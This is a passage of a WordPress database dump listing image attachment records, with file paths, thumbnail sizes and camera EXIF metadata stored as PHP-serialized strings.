 P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472923909\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"10.3\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0033921302578\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(523,253,'_wp_attached_file','2016/03/DSCN3881.jpg'),(524,253,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2016/03/DSCN3881.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3881-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3881-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3881-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3881-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3881-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3881-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3881-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3881-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3881-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3881-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3881-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3881-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472923923\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"10.3\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00384615384615\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(525,254,'_wp_attached_file','2016/03/DSCN3872.jpg'),(526,254,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2016/03/DSCN3872.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3872-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3872-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3872-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3872-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3872-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3872-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3872-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3872-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3872-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3872-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3872-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3872-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472923556\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"20.8\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00466417910448\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(527,255,'_wp_attached_file','2016/03/DSCN3873.jpg'),(528,255,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2016/03/DSCN3873.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3873-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3873-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3873-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3873-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3873-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3873-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3873-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3873-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3873-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3873-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3873-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3873-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472923587\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"28.8\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(529,256,'_wp_attached_file','2016/03/DSCN3874.jpg'),(530,256,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2016/03/DSCN3874.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3874-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3874-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3874-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3874-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3874-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3874-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3874-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3874-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3874-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3874-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3874-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3874-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472923663\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00490918016691\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(531,257,'_wp_attached_file','2016/03/DSCN3875.jpg'),(532,257,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2016/03/DSCN3875.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3875-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3875-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3875-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3875-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3875-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3875-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3875-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3875-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3875-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3875-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3875-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3875-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472923672\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"16.9\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00543773790103\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(533,258,'_wp_attached_file','2016/03/DSCN3876.jpg'),(534,258,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2016/03/DSCN3876.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3876-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3876-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3876-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3876-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3876-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3876-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3876-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3876-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3876-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3876-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3876-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3876-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472923705\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"11.8\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00503018108652\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(535,270,'_wp_attached_file','2016/03/DSCN3572.jpg'),(536,270,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN3572.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3572-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3572-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3572-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3572-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3572-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3572-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3572-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3572-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3572-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3572-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3572-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3572-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1464913522\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0100502512563\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(543,276,'_wp_attached_file','2017/01/ashleyslide.jpg'),(544,276,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:23:\"2017/01/ashleyslide.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"ashleyslide-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"ashleyslide-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:23:\"ashleyslide-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:23:\"ashleyslide-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"ashleyslide-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:23:\"ashleyslide-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:23:\"ashleyslide-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:23:\"ashleyslide-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:23:\"ashleyslide-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:23:\"ashleyslide-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1185205822\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"13.1\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(547,278,'_wp_attached_file','2017/01/Bandemer-005.jpg'),(548,278,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:24:\"2017/01/Bandemer-005.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Bandemer-005-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Bandemer-005-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:24:\"Bandemer-005-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:24:\"Bandemer-005-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"Bandemer-005-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:24:\"Bandemer-005-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:24:\"Bandemer-005-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:24:\"Bandemer-005-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:24:\"Bandemer-005-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:24:\"Bandemer-005-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1181929078\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"65.2\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(549,279,'_wp_attached_file','2017/01/boxmeyer-group.jpg'),(550,279,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:26:\"2017/01/boxmeyer-group.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"bo